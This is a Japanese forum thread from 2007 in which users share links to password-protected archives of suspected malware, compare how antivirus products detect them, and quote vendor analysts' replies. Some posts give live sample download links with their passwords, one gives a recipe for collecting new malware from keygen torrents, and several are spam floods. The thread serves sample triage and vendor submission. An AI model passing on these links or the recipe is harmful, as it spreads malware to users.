ファイル圧縮ソフト「+Lhaca」に脆弱性、XPでバックドアを開く可能性も
ttp://japan.cnet.com/news/sec/story/0,2000056024,20351628,00.htm?ref=rss

176 :名無しさん@お腹いっぱい。:2007/06/27(水) 01:10:40
>>172
カスペ7

detected: Trojan program Trojan-Proxy.Win32.Agent.iw File: tane_uljp00057.rar/yamada.zip/yamada/windows vista keygen.exe

未検知のやつは提出しておきます。

177 :名無しさん@お腹いっぱい。:2007/06/27(水) 01:20:27
>>176
GJ

178 :名無しさん@お腹いっぱい。:2007/06/27(水) 02:01:07
NODも参加しろよ

179 :名無しさん@お腹いっぱい。:2007/06/27(水) 06:01:08
http://omanchin.com/railway/omanchin.cgi/eroero.zip
Pass:kentai

180 :名無しさん@お腹いっぱい。:2007/06/27(水) 06:31:58
でたomanchin.com

181 :名無しさん@お腹いっぱい。:2007/06/27(水) 07:58:32
>>172
バスター2007
全て未検知、提出しておきます

182 :名無しさん@お腹いっぱい。:2007/06/27(水) 09:47:35
>>172
McAfee
windows vista keygen.exe : BackDoor-CYC

残りは提出しときます

183 :名無しさん@お腹いっぱい。:2007/06/27(水) 10:32:46
>>172
AVG
WINDOWS VISTA KEYGEN.EXEからTrojan horse Proxy.DENを検出
他二つは検体送りました

184 :名無しさん@お腹いっぱい。:2007/06/27(水) 10:59:34
>>172
キラー
D:\virus\tane_uljp00057\yamada.zip>>yamada/windows vista keygen.exe
Trojan.Proxy.Agent.nc

185 :176:2007/06/27(水) 13:40:29
カスペで未検知の2つのファイルのコード解析をお願いした結果、
windows vista keygen.exe以外は「白」判定。

From: newvirus@kaspersky.com [mailto:newvirus@kaspersky.com]
Sent: Wednesday, June 27, 2007 5:56 AM
Subject: RE: Please Inspect This File: A New Virus> [KLAB-2333153]


Hello.
No malicious software was found in the attached file.
(添付ファイルに悪意のあるソフトウェアはなし)


Please quote all when answering.
-----------------
Regards, Kirill Erakhtin
Virus Analyst, Kaspersky Lab.

Ph.: +7(095) 797-8700
E-mail: newvirus@kaspersky.com
http://www.kaspersky.com http://www.viruslist.com

186 :名無しさん@お腹いっぱい。:2007/06/27(水) 13:51:38
>>172
NOD32
ヒューリスティックにて検出
X:\Virus\yamada.zip ≫ZIP ≫yamada/windows vista keygen.exe - ウイルスの可能性 : NewHeur_PE ウイルス [7]

187 :名無しさん@お腹いっぱい。:2007/06/27(水) 17:06:08
>>172
キラー

   1.文件名:0bd95a05 ya_wmp.exe
   不是病毒

   2.文件名:61d1ea8d ya_wmp.exe
   不是病毒

188 :名無しさん@お腹いっぱい。:2007/06/27(水) 17:15:11
結局。***._wmp.exeは病毒じゃなかったでFA?

189 :名無しさん@お腹いっぱい。:2007/06/27(水) 17:28:14
だろうね

190 :名無しさん@お腹いっぱい。:2007/06/27(水) 22:16:29
http://www.virustotal.com/vt/en/resultadof?2861ab7852f82ca02739f0302c0b7724

NORTON MS AVIRA あたりが黒と判定
カスペ NOD BIT が無害判定

おまいら どっちだと思う?

191 :名無しさん@お腹いっぱい。:2007/06/27(水) 22:33:16
別に思いなんかどうだっていいし

192 :名無しさん@お腹いっぱい。:2007/06/27(水) 22:46:52
白だと思うよ。(出来損ないのウイルス)

Aviraも「TR/Crypt.CFI.Gen」

Tr = Trojan
Crypt = Crypted, 暗号化された、パッカーされた。
CFI = パッカー名
Gen = Generic ジェネリック検知、ヒューリスティックで検知。

で、シグネチャ検知ではないし、
AntiVirの場合は、パッカーは、とりあえず、すべて黒でジェネリック検知。それから、ホワイトリストで無害なものをのぞく方式をとっているから。

ただ、カスペは>>185で、リバースエンジニアリングまでした結果、無害と判断したから白だと思うよ。

私見だがね。

193 :名無しさん@お腹いっぱい。:2007/06/27(水) 22:59:57
なるほど AVIRAはそういうやり方なわけね
しかしベンダによってMydoomと判定したり山田と判定したりSdbotと判定したりと変なファイルだな
出来損ないウイルスってのが妥当なのかな

194 :名無しさん@お腹いっぱい。:2007/06/27(水) 23:12:59
Aviraは誤検出が多いからな

195 :名無しさん@お腹いっぱい。:2007/06/28(木) 05:59:10
AVGからのメール
Dear Sir/Madam,

Thank you for your email.

Please let us inform you, that files attached to your last e-mail were corrupted (incomplete) Due this thay can not be executed and are harmless/useless.

Please feel free to contact us If you have any further questions

Thank you for your cooperation

Best regards,

Vit Chaloupecky
AVG Technical Support

無害らしい

196 :名無しさん@お腹いっぱい。:2007/06/28(木) 11:32:19
>>195
上でも出てるが、俺もカスペに送ったら、

Hello.

This file is corrupted.

Sincerely yours,

って返ってきた。

要するに、不正なコードはあるが、ファイルが壊れてて機能しないってオチじゃね?

197 :名無しさん@お腹いっぱい。:2007/06/28(木) 12:54:32
改変しようとして、変数名の間違いや関数を呼び出さないなどのバグだらけ。
なまじ、危険なウイルスだからデバッグもろくにしない。
冷やかし半分の低脳なゆとり厨房がウイルス作ると、この程度。


198 :名無しさん@お腹いっぱい。:2007/06/28(木) 14:49:32
>>172のファイルは山田にPariteが感染したものだと思われ。
ttp://www.dotup.org/uploda/www.dotup.org3695.rar.html
pass: virus

199 :名無しさん@お腹いっぱい。:2007/06/28(木) 17:41:32
【検体サンプル】>>198
【ソフト名】ウイルスキラー2007 19.29.32
【結果】↓(4/5体)
【SS】ttp://www5.uploader.jp/dl/tane/tane_uljp00059.png

200 :名無しさん@お腹いっぱい。:2007/06/28(木) 17:42:33
>>199
SS訂正
ttp://www5.uploader.jp/user/tane/images/tane_uljp00059.png

201 :名無しさん@お腹いっぱい。:2007/06/28(木) 18:19:00
>>198
McAfee
test.mp3.exe : W32/Pate.b + W32/Antinny.worm.q
winsocks.dll : BackDoor-DIS
explorer.exe : Generic.BackDoor.ba

ya_wmp.exe : 反応なし

ya_wmp.exeはVirusTotal的には>>172のと一緒かな?

202 :名無しさん@お腹いっぱい。:2007/06/28(木) 18:19:14
【検体サンプル】>>198 d。
【ソフト名】カスペルスキー7.0
【結果】↓(3/5体)
【SS】http://www5.uploader.jp/dl/tane/tane_uljp00060.png.html

detected: Trojan program Trojan-Proxy.Win32.Agent.iw File: www.dotup.org3695.rar/test.zip/c_drive/RECYCLER/explorer.exe//PE_Patch.Morphine//Morphine//UPX
detected: Trojan program Backdoor.Win32.Agent.xs File: \www.dotup.org3695.rar/test.zip/c_drive/WINDOWS/system32/winsocks.dll//PE_Patch.Morphine//Morphine//UPX
detected: virus Virus.Win32.Parite.b File: www.dotup.org3695.rar/test.zip/test.mp3 .exe

「また、おまえか!」と思われるけれど、検体提出します。orz

203 :名無しさん@お腹いっぱい。:2007/06/28(木) 18:24:52
>>198
>>199-200 キラー Risingが20分で返事してきたw
   1.文件名:ya_wmp.exe
   不是病毒

ゴミみたいスネ

204 :名無しさん@お腹いっぱい。:2007/06/28(木) 18:32:27
>>198
Norton Internet Security 2007

解凍後に、4体検知
test.mp3 .exe - W32.Yawmo
ya_wmp.exe - W32.Yawmo
winsocks.dll - W32.Mydoom.B@mm
explorer.exe - Backdoor.Nodelm

205 :204:2007/06/28(木) 18:40:32
dllアリにして大丈夫なのか?

206 :名無しさん@お腹いっぱい。:2007/06/28(木) 18:54:22
>>198

http://www.virustotal.com/vt/en/resultadof?851efef7151d407f385e3d7f71f2e3c5
http://www.virustotal.com/vt/en/resultadof?860f69e3ef2829d9a5ad9287632b269c
http://www.virustotal.com/vt/en/resultadof?96cc42c366fa602446ec0f531abea15f

サイズは同じだが、MD5が異なる。

>>203

キラーの即答テラハヤス。
やっぱり、不病毒かね?

207 :名無しさん@お腹いっぱい。:2007/06/28(木) 18:56:54
キラーを信じて試してガッテンしてみたら?

208 :名無しさん@お腹いっぱい。:2007/06/28(木) 19:37:42
>>202
( ・∀・)っ旦~

209 :202:2007/06/28(木) 20:26:26
>>198
ya.wmp.exeのカスペの判定は「白」でした。他社の検体名も列挙したのでしたが、

-----Original Message-----
From: newvirus@kaspersky.com [mailto:newvirus@kaspersky.com]
Sent: Thursday, June 28, 2007 7:26 PM
Subject: RE: Please Inspect This File: A New Virus? [KLAB-2340675]

Hello.
Nothing virus\trojan like found (ウイルスやトロイのようなものは見つからなかった。)
--
Regards, Alexey Malyshev
Virus analyst, Kaspersky Lab.

>>208 いただきます。

e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/
http://www.viruslist.com/en/weblog

> Attachment: ya_wmp.rar

> Hi
>
> Please inspect this attached file, "ya_wmp.rar"
> The Password is "123"
> This may be Malware.
> Some Security Vendors regard it as malware (Antinny popular in Japan?)
> Here's the result of VirusTotal.
> http://www.virustotal.com/vt/en/resultadof?851efef7151d407f385e3d7f71f2e3c5

以下略

210 :名無しさん@お腹いっぱい。:2007/06/28(木) 23:46:21
>>198
AntiVir PersonalEdition Classic

[0] Archive type: ZIP
--> c_drive/RECYCLER/explorer.exe
[DETECTION] Is the Trojan horse TR/Proxy.Agent.IW.2
--> c_drive/WINDOWS/system32/winsocks.dll
[DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Agent.XS.1 Backdoor server programs
--> c_drive/WINDOWS/system32/ya_wmp.exe
[DETECTION] Is the Trojan horse TR/Crypt.CFI.Gen
--> test.mp3 .exe
[DETECTION] Contains code of the Windows virus W32/Parite
[INFO] The file was moved to '46f6c84b.qua'!

211 :名無しさん@お腹いっぱい。:2007/06/29(金) 01:36:15
>>209
GJ

おいらも4回連続で
マルウェアじゃねーぞ返信メールをもらったが
くじけちゃいないぞ

212 :名無しさん@お腹いっぱい。:2007/06/29(金) 05:09:51
>>198
NOD32
X:\Virus\www.dotup.org3695\test.zip ≫ZIP ≫c_drive/RECYCLER/explorer.exe - Win32/TrojanProxy.Agent.IW トロイ
X:\Virus\www.dotup.org3695\test.zip ≫ZIP ≫c_drive/WINDOWS/system32/winsocks.dll - Win32/Agent.XS トロイ
X:\Virus\www.dotup.org3695\test.zip ≫ZIP ≫test.mp3 .exe - Win32/Parite.B ウイルス
検査したファイル数:4
検出されたウイルス数:3
検査終了時刻:21:52:24検査に要した時間:0秒(00:00:00)

>210
> --> c_drive/WINDOWS/system32/ya_wmp.exe
> [DETECTION] Is the Trojan horse TR/Crypt.CFI.Gen
ヒューリスティックによる誤検出?

213 :名無しさん@お腹いっぱい。:2007/06/29(金) 06:37:35
>>198
AVG
《Object》C:\WINDOWS\デスクトップ\www.dotup.org3695\test.zip:\c_drive\RECYCLER\explorer.exe
《Result》Trojan horse Proxy.BIX
《Status》Infected, Embedded object

《Object》C:\WINDOWS\デスクトップ\www.dotup.org3695\test.zip:\c_drive\WINDOWS\system32\winsocks.dll
《Result》May be infected by unknown virus .MPH
《Status》Infected, Embedded object

《Object》C:\WINDOWS\デスクトップ\www.dotup.org3695\test.zip:\test.mp3 .exe
《Result》Virus found Win32/Parite
《Status》Infected, Embedded object

ya_wmp.exe-反応なし

214 :名無しさん@お腹いっぱい。:2007/06/29(金) 08:53:12
>>212
白だな。
キラーも黒から白に訂正。
AVGは、破損ファイル
カスペは、無害

こういう偽ファイルを作るのがP2Pで流行っているのか?


215 :名無しさん@お腹いっぱい。:2007/06/29(金) 09:21:28
これはソースネクスト社員、もしくはユーザの陰謀だな

他のユーザに無意味な努力をさせ
その内疲れたユーザたちは検体を送らないようになる

そうすれば検出率が下がり
ソース製品との差も縮む・・・

やるな・・・ソース関係者

216 :名無しさん@お腹いっぱい。:2007/06/29(金) 10:06:40
>>215

ねえ、モルダー
あなたちょっと考えすぎだわ!
ちょっと休んだらどう?w

217 :名無しさん@お腹いっぱい。:2007/06/29(金) 23:18:46
【新種ウイルスの簡単な集め方】
1.BittorrentのクライアントソフトBitcometをインストールする(port解放不要 設定は初期設定のままでもOK)
2.トレントサイトのApplicationやSoftwareのページでkeygen patch crackなどで検索し容量がだいたい1.5M以下位の物をダウソする
3.ウイルスかどうかのだいたいの判別はオンラインスキャン(virustotal等)で行えば良い
たったのこれだけ!

218 :名無しさん@お腹いっぱい。:2007/06/29(金) 23:20:07
じゃあ>>217に任せたw

219 :名無しさん@お腹いっぱい。:2007/06/29(金) 23:35:30
つかマジで頭おかしいな
何のために集めてんだよ
ウイルスの収集自体が目的になっちまったら終わりだな

220 :名無しさん@お腹いっぱい。:2007/06/30(土) 01:37:14
virustotalでも判別出来ないファイルを暇な時に実行して遊ぶんだよ
アンインストールソフトでファイルやレジストリの行方を追って
それでウイルスだった場合はAviraにだけ送る
一カ月で飽きたけどなw


221 :名無しさん@お腹いっぱい。:2007/06/30(土) 01:41:39
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://


222 :名無しさん@お腹いっぱい。:2007/06/30(土) 01:46:33

tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://


223 :名無しさん@お腹いっぱい。:2007/06/30(土) 01:55:04
ttp://s.jpg ttp://t.jpg ttp://u.jpg ttp://v.jpg ttp://w.jpg ttp://x.jpg ttp://y.jpg ttp://z.jpg ttp://1.jpg ttp://2.jpg ttp://3.jpg ttp://4.jpg ttp://5.jpg ttp://6.jpg ttp://7.jpg ttp://8.jpg ttp://9.jpg ttp://0.jpg
ttp://aa.jpg ttp://ab.jpg ttp://ac.jpg ttp://ad.jpg ttp://ae.jpg ttp://af.jpg ttp://ag.jpg ttp://ah.jpg ttp://ai.jpg ttp://aj.jpg ttp://ak.jpg ttp://al.jpg ttp://am.jpg ttp://an.jpg ttp://ao.jpg ttp://ap.jpg ttp://aq.jpg ttp://ar.jpg
ttp://as.jpg ttp://at.jpg ttp://au.jpg ttp://av.jpg ttp://aw.jpg ttp://ax.jpg ttp://ay.jpg ttp://az.jpg ttp://a1.jpg ttp://a2.jpg ttp://a3.jpg ttp://a4.jpg ttp://a5.jpg ttp://a6.jpg ttp://a7.jpg ttp://a8.jpg ttp://a9.jpg ttp://a0.jpg
ttp://ba.jpg ttp://bb.jpg ttp://bc.jpg ttp://bd.jpg ttp://be.jpg ttp://bf.jpg ttp://bg.jpg ttp://bh.jpg ttp://bi.jpg ttp://bj.jpg ttp://bk.jpg ttp://bl.jpg ttp://bm.jpg ttp://bn.jpg ttp://bo.jpg ttp://bp.jpg ttp://bq.jpg ttp://br.jpg
ttp://bs.jpg ttp://bt.jpg ttp://bu.jpg ttp://bv.jpg ttp://bw.jpg ttp://bx.jpg ttp://by.jpg ttp://bz.jpg ttp://b1.jpg ttp://b2.jpg ttp://b3.jpg ttp://b4.jpg ttp://b5.jpg ttp://b6.jpg ttp://b7.jpg ttp://b8.jpg ttp://b9.jpg ttp://b0.jpg
ttp://ca.jpg ttp://cb.jpg ttp://cc.jpg ttp://cd.jpg ttp://ce.jpg ttp://cf.jpg ttp://cg.jpg ttp://ch.jpg ttp://ci.jpg ttp://cj.jpg ttp://ck.jpg ttp://cl.jpg ttp://cm.jpg ttp://cn.jpg ttp://co.jpg ttp://cp.jpg ttp://cq.jpg ttp://cr.jpg
ttp://cs.jpg ttp://ct.jpg ttp://cu.jpg ttp://cv.jpg ttp://cw.jpg ttp://cx.jpg ttp://cy.jpg ttp://cz.jpg ttp://c1.jpg ttp://c2.jpg ttp://c3.jpg ttp://c4.jpg ttp://c5.jpg ttp://c6.jpg ttp://c7.jpg ttp://c8.jpg ttp://c9.jpg ttp://c0.jpg
ttp://da.jpg ttp://db.jpg ttp://dc.jpg ttp://dd.jpg ttp://de.jpg ttp://df.jpg ttp://dg.jpg ttp://dh.jpg ttp://di.jpg ttp://dj.jpg ttp://dk.jpg ttp://dl.jpg ttp://dm.jpg ttp://dn.jpg ttp://do.jpg ttp://dp.jpg ttp://dq.jpg ttp://dr.jpg


224 :名無しさん@お腹いっぱい。:2007/06/30(土) 08:59:26
AV-Comparatives Retrospective / ProActive - Test November 2006
http://www.av-comparatives.org/seiten/ergebnisse_2006_11.php

------------------------------------
01位 5615(53%) AntiVir PE Premium
02位 5573(53%) NOD32 Anti-Virus
03位 4846(46%) TrustPort AV WS
04位 4490(43%) AntiVirusKit (AVK)
05位 4378(42%) BitDefender Prof.+

06位 4361(42%) VBA32 Workstation
07位 3584(34%) Dr. Web
08位 2140(20%) NormanVirusControl
09位 1924(18%) Avast! Professional
10位 1850(18%) McAfee VirusScan

11位 1578(15%) Norton Anti-Virus
12位 1568(15%) F-Prot Anti-Virus
13位 0751(07%) F-Secure Anti-Virus
14位 0750(07%) Kaspersky AV
15位 0310(03%) AVG Professional
------------------------------------


225 :名無しさん@お腹いっぱい。:2007/07/03(火) 00:43:29
ViDrFullSetup.exe についてくるファイルですがウイルスみたい。

pass : virus
http://www5.uploader.jp/dl/tane/tane_uljp00061.zip.html

226 :名無しさん@お腹いっぱい。:2007/07/03(火) 00:45:24
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://
tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp:// tp://


227 :名無しさん@お腹いっぱい。:2007/07/03(火) 00:47:28
>>221-223,>>226
あぼーん推奨

228 :名無しさん@お腹いっぱい。:2007/07/03(火) 00:47:30
ttp://s.jpg ttp://t.jpg ttp://u.jpg ttp://v.jpg ttp://w.jpg ttp://x.jpg ttp://y.jpg ttp://z.jpg ttp://1.jpg ttp://2.jpg ttp://3.jpg ttp://4.jpg ttp://5.jpg ttp://6.jpg ttp://7.jpg ttp://8.jpg ttp://9.jpg ttp://0.jpg
ttp://aa.jpg ttp://ab.jpg ttp://ac.jpg ttp://ad.jpg ttp://ae.jpg ttp://af.jpg ttp://ag.jpg ttp://ah.jpg ttp://ai.jpg ttp://aj.jpg ttp://ak.jpg ttp://al.jpg ttp://am.jpg ttp://an.jpg ttp://ao.jpg ttp://ap.jpg ttp://aq.jpg ttp://ar.jpg
ttp://as.jpg ttp://at.jpg ttp://au.jpg ttp://av.jpg ttp://aw.jpg ttp://ax.jpg ttp://ay.jpg ttp://az.jpg ttp://a1.jpg ttp://a2.jpg ttp://a3.jpg ttp://a4.jpg ttp://a5.jpg ttp://a6.jpg ttp://a7.jpg ttp://a8.jpg ttp://a9.jpg ttp://a0.jpg
ttp://ba.jpg ttp://bb.jpg ttp://bc.jpg ttp://bd.jpg ttp://be.jpg ttp://bf.jpg ttp://bg.jpg ttp://bh.jpg ttp://bi.jpg ttp://bj.jpg ttp://bk.jpg ttp://bl.jpg ttp://bm.jpg ttp://bn.jpg ttp://bo.jpg ttp://bp.jpg ttp://bq.jpg ttp://br.jpg
ttp://bs.jpg ttp://bt.jpg ttp://bu.jpg ttp://bv.jpg ttp://bw.jpg ttp://bx.jpg ttp://by.jpg ttp://bz.jpg ttp://b1.jpg ttp://b2.jpg ttp://b3.jpg ttp://b4.jpg ttp://b5.jpg ttp://b6.jpg ttp://b7.jpg ttp://b8.jpg ttp://b9.jpg ttp://b0.jpg
ttp://ca.jpg ttp://cb.jpg ttp://cc.jpg ttp://cd.jpg ttp://ce.jpg ttp://cf.jpg ttp://cg.jpg ttp://ch.jpg ttp://ci.jpg ttp://cj.jpg ttp://ck.jpg ttp://cl.jpg ttp://cm.jpg ttp://cn.jpg ttp://co.jpg ttp://cp.jpg ttp://cq.jpg ttp://cr.jpg
ttp://cs.jpg ttp://ct.jpg ttp://cu.jpg ttp://cv.jpg ttp://cw.jpg ttp://cx.jpg ttp://cy.jpg ttp://cz.jpg ttp://c1.jpg ttp://c2.jpg ttp://c3.jpg ttp://c4.jpg ttp://c5.jpg ttp://c6.jpg ttp://c7.jpg ttp://c8.jpg ttp://c9.jpg ttp://c0.jpg
ttp://da.jpg ttp://db.jpg ttp://dc.jpg ttp://dd.jpg ttp://de.jpg ttp://df.jpg ttp://dg.jpg ttp://dh.jpg ttp://di.jpg ttp://dj.jpg ttp://dk.jpg ttp://dl.jpg ttp://dm.jpg ttp://dn.jpg ttp://do.jpg ttp://dp.jpg ttp://dq.jpg ttp://dr.jpg


229 :名無しさん@お腹いっぱい。:2007/07/03(火) 01:08:30
【検体サンプル】>>225
【ソフト名】Kaspersky 7
【結果】なし

ただし

http://www.virustotal.com/vt/en/resultadof?ffa0c131f2e1f731eacef734d3b6f7c3

AntiVir TR/Agent.20992.5
AVG PSW.Agent.DNX
BitDefender Generic.Malware.w.7D653E9C
eSafe Win32.Trojan
Ewido Logger.Agent.pl
FileAdvisor High Threat Detected
F-Secure Win32.Agent.AULS
Ikarus Trojan-Spy.win32.agent.pl
Norman Win32.Agent.AULS
Panda Generic Trojan
Sunbelt Trojan.w
Symantec Trojan.Horse
TheHacker Trojan/Spy.Agent.pl
VBA32 Trojan-Spy.Agent.pl
WebAgentWasher TR/Agent.20992.5


黒っぽいね。実行しない方が吉。

検体をカスペに提出します。

230 :名無しさん@お腹いっぱい。:2007/07/03(火) 01:13:28
>>229
しょっぱなから一人でまとめんなよカスが
鑑定スレじゃねーんだよ 

231 :名無しさん@お腹いっぱい。:2007/07/03(火) 01:16:54
>>230
手間省けた分だけありがたいと思え。

232 :名無しさん@お腹いっぱい。:2007/07/03(火) 01:21:43
>>229
d

233 :名無しさん@お腹いっぱい。:2007/07/03(火) 01:51:07
>>229
乱暴な言い方でごめん


234 :229:2007/07/03(火) 02:24:10
-----Original Message-----
From: newvirus@kaspersky.com [mailto:newvirus@kaspersky.com]
Sent: Tuesday, July 03, 2007 2:06 AM
Subject: RE: Please Inspect This File. A New Virus ? [KLAB-2368165]

Hello,

slp_co.dll

No malicious code was found in this file.

Please quote all when answering.

--
Best regards, Vladimir Lebedev
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.


あれ?

235 :名無しさん@お腹いっぱい。:2007/07/03(火) 05:26:34
【検体サンプル】>>225
【ソフト名】ウイルスキラー2007 19.30.02
【結果】Trojan.MnLess.kcx
【SS】http://www5.uploader.jp/user/tane/images/tane_uljp00063.png

236 :名無しさん@お腹いっぱい。:2007/07/03(火) 10:41:42
>>225
例によってマカフィーさんはだんまりなので送ります

237 :名無しさん@お腹いっぱい。:2007/07/03(火) 12:15:12
>>229
(`・ω・´)ゞ

238 :名無しさん@お腹いっぱい。:2007/07/05(木) 22:39:27
>>225 のもとファイル
ttp://file.vidr.jp/setup/ViDrFullSetup.exe
exeの中身
ttp://www5.uploader.jp/dl/tane/tane_uljp00064.zip.html

239 :名無しさん@お腹いっぱい。:2007/07/07(土) 13:16:12
ttp://www5.uploader.jp/dl/tane/tane_uljp00065.rar.html
virus

240 :名無しさん@お腹いっぱい。:2007/07/07(土) 13:32:18
